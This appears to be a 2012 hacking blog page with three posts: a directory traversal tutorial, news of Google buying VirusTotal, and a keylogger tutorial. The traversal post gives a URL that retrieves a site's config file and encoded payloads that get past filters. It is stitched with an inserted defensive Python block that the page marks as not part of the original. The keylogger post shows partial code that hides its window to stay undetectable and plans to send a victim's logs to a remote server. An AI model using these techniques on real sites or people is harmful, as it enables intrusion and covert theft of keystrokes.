Friday, September 14, 2012
Hacking websites using Directory Traversal Attacks | Hackingloops

Hacking websites has become a little more difficult nowadays, as developers are also focusing on the OWASP (Open Web Application Security Project) Top 10 vulnerabilities, which hackers normally use to hack websites. Today Hackingloops brings you a tutorial on directory traversal attacks (part of the Top 10 vulnerabilities). So friends, let's start our tutorial on hacking websites using directory traversal attacks.


A directory is basically a folder where the web designer stores the website's files (this is with respect to the server). By directory traversal attack, I simply mean that a hacker is able to navigate between the directories and the files stored in them (say, the root, which contains all the config files, the htaccess file, ini files and XQuery files; these are the most sensitive files for any website, and if the security of any of them is not handled properly, a hacker can own the website). In short, the hacker's main aim in a directory traversal attack is to get access to the sensitive files mentioned above.
Nowadays attackers also use directory traversal attacks to view arbitrary files on the web server, such as SSL private keys and password files.

Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking.

What does ../ or ..\ (dot dot slash) mean?
The ..\ instructs the system to go one directory (or simply, folder) up.
For example, say we are at the location C:\Hacking\Hacking Tools\Bugtraq. On typing ..\ , we reach
C:\Hacking\Hacking Tools.
On typing ..\ again, we reach
C:\Hacking and so on.

Let's go back to the location C:\Hacking\Hacking Tools\Bugtraq. Now suppose we want to access a file abcfile.txt placed in the folder Hacking. We just need to type ..\..\abcfile.txt . Typing ..\ two times takes us two directories up (that is, to the directory Hacking), where abcfile.txt is stored.
I hope you got the dot dot slash concept. Now let's proceed further.

So by now we have a complete understanding of what a directory is and what dot dot slash means. Now let's understand clearly what a directory traversal attack means.

A directory traversal attack is an HTTP (or in simple terms, web) exploit or vulnerability which allows attackers or hackers to access restricted directories (most hackers are interested in root directory access) and execute commands outside of the web server's root directory. The goal of this attack is to access sensitive files placed on the web server by stepping inside the root directory using the dot dot slash technique. By exploiting a directory traversal vulnerability, an attacker can access files in directories other than the root directory. This can be harmful, since access to restricted files containing passwords or other private information may compromise the web server.

For example, by typing the following URL:

http://www.samplesite.com/sample.php?item=../../../../web-config.php

The attacker or hacker causes sample.php to retrieve the file ../../../../web-config.php and display it in the attacker's web browser. As I have already told you, the character sequence "../" stands for "one directory up". So the string "../../../../web-config.php" means "go four directories up, then down into the root directory and retrieve the file web-config.php from there".
The attacker needs to guess how many directories to climb in order to get to the desired directory, but this can easily be done by trial and error.

I have set up a live example on my system, using a Tomcat server, to explain this vulnerability.
Say I am browsing this page:

[Image 1: Directory traversal attack sample]

Now I change test1/about.jsp to ../product.jsp and press Enter:

[Image 2: Directory traversal attack sample]

Here is the result of the above step: we are able to access product.jsp in the root folder, because this sample was vulnerable to a directory traversal attack.

[Image 3: Directory traversal attack sample]

Note:

Some web applications scan query string for dangerous characters such as:
  • ..
  • ..\
  • ../
to prevent directory traversal attacks.
However, the query string is usually URI-decoded before use. These applications are therefore vulnerable to percent-encoded directory traversal such as:
  • %2e%2e%2f which translates to ../
  • %2e%2e/ which translates to ../
  • ..%2f which translates to ../
  • %2e%2e%5c which translates to ..\

Also, Microsoft added Unicode character support in Windows Internet Explorer, which introduced a new way of encoding ../ and caused their attempts at directory traversal prevention to be bypassed.
Multiple percent encodings, such as
  • %c1%1c
  • %c0%af
are translated into / or \ characters.
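
The difference between scanning the raw query string and checking the decoded, canonical path, shown as an added example that is not part of the original post. BASE_DIR, the function names and the sample request values are assumptions made for the illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Hypothetical directory the application is allowed to serve files from.
BASE_DIR = "/var/www/site/pages"

def naive_filter(raw_item: str) -> bool:
    """Weak check from the note above: scan the raw, still-encoded value."""
    return not any(bad in raw_item for bad in ("..", "../", "..\\"))

def safe_resolve(raw_item: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Decode, canonicalise, then require the result to stay under base_dir.
    Returns the absolute path to serve, or None if the request is refused."""
    try:
        # Strict decoding refuses byte sequences that are not valid UTF-8,
        # so %c0%af and %c1%1c are rejected instead of becoming / or \.
        decoded = unquote(raw_item, errors="strict")
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded:  # NUL is never valid in a file name
        return None
    decoded = decoded.replace("\\", "/")  # treat ..\ exactly like ../
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))
    # The decision is made on the final path, not on characters in the request.
    if os.path.commonpath([base, target]) != base:
        return None
    return target

# Constructed request values built from the encodings listed above.
SAMPLES = [
    "test1/about.jsp",
    "../product.jsp",
    "%2e%2e%2fproduct.jsp",
    "%2e%2e/product.jsp",
    "..%2fproduct.jsp",
    "%2e%2e%5cproduct.jsp",
    "..%c0%afproduct.jsp",
]

def check_all(samples=SAMPLES):
    """Return (value, passes_naive_filter, served_path_or_None) per sample."""
    return [(s, naive_filter(s), safe_resolve(s)) for s in samples]

if __name__ == "__main__":
    for value, naive_ok, path in check_all():
        print(f"{value!r:28} naive filter passes={naive_ok!s:5} served={path}")
```

The percent-encoded values pass the raw-string filter but are refused once the path is decoded and resolved; only test1/about.jsp is served.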


As good ethical hackers, we must know how to protect against these loopholes while designing or securing a new or existing website. So I will also explain the protective measures for securing our website against directory traversal attacks. But for that you all need to wait for my next article :P.

I hope you all have enjoyed the article. If you have any queries or questions, or didn't understand anything, feel free to contact me through the comments below, or mail your request directly to lokesh@hackingloops.com.

If you like this article then please comment, and if you think something is missing and needs to be added, feel free to suggest it. Thanks for reading!
Saturday, September 8, 2012
Google buys Virustotal to enhance Security

Well, don't be shocked, but it's true. Google has bought online malware-scanning firm VirusTotal and is pledging to keep the service open to support security software vendors. It is probably going to be one of the biggest setbacks for hackers, because Google is now set to enter the security field. VirusTotal is one of the biggest online malware-scanning websites, and now it's a part of Google.

"We've worked hard to ensure that the services we offer continually improve. But as a small, resource-constrained company, that can sometimes be challenging," the security firm said in its "Inside VirusTotal's Pants" blog. "So we're delighted that Google, a long-time partner, has acquired VirusTotal. This is great news for you, and bad news for malware generators."
VirusTotal was set up in 2007 and uses over 40 different antivirus engines to scan files and URLs for malware for free. Users can upload small files for checking, or just input a URL, to see if it's on a blacklist, and VirusTotal shares its results with other security vendors to allow them to beef up their defenses.
The computer security industry is unusual in that its members share some of their most valuable data, malware signatures, with competitors. This ensures that new malware is tamped down quickly and the rising tide of security raises all boats. Even Microsoft shares its data, so Google's confirmation is a good sign for the industry.
Google didn't say how much it is spending to purchase VirusTotal, but it has pledged that it will continue to share information from the service with other vendors. It's not saying how it will be integrating the VirusTotal technology, but safer searching and better malware security for its Apps platform look the most likely bets.
"Security is incredibly important to our users and we've invested many millions of dollars to help keep them safe online," a Google spokeswoman told El Reg. "VirusTotal also has a strong track record in web security, and we're delighted to be able to provide them with the infrastructure they need to ensure that their service continues to improve."
Saturday, September 1, 2012
How to code keylogger in C programming Language

How to code a keylogger in the C programming language: C codechamp has brought you a detailed tutorial on how to write keylogger code in C.
A keylogger is a computer program which captures all the keystrokes pressed by the user in real time. It captures all the keys, writes them to some file, say log.txt, and stores it on the computer's hard disk. Whether these logs are then sent to an email or FTP address depends on the type of keylogger, that is, whether it is a remote keylogger or a physical keylogger. Physical keyloggers are useful when you have physical access to the system and can retrieve the logs personally, while remote keyloggers can be used from anywhere in the world; the only requirement is that the victim must have an internet connection. Today we will be writing a C program for a physical keylogger or keystroke logger, which requires physical access to the system. We will be extending our logic in further programs to make it a remote keylogger which sends logs to FTP servers and emails directly. So first of all, let's see how a simple keylogger program works…


Algorithm for writing a simple keylogger:
1. Create an empty log file for storing keylogs.
2. Intercept keys pressed by the user using the GetAsyncKeyState() function.
3. Store these intercepted values in the file.
4. Hide the running window dialog to make it undetectable.
5. Use a while loop to keep it running in all conditions.
6. Add the Sleep() function to reduce the CPU usage to 0%.

Now let us see the C program of a keylogger or keystroke logger, which intercepts all the keys pressed by the user and stores them in a log file.

C program of Keylogger or keystroke logger :
#include<iostream>
#include<windows.h>
#include<fstream>
#include<time.h>
using namespace std;

int main()
{
 bool runlogger = true;
 ofstream log;
 //where your logs will be stored
 log.open("C:\\log.txt", ofstream::out);
 //displaying error message when unable to open file
 if(log.fail())
  {
   printf("Error in opening log.txt file\n");
   }
  //Code for hiding running dialog
  HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
  ShowWindow(hideIt,0);
  //Logic for capturing keystrokes ........
  ...................
To view the complete C program visit my website on C programming :

C program of Keylogger or keystroke logger | C codechamp
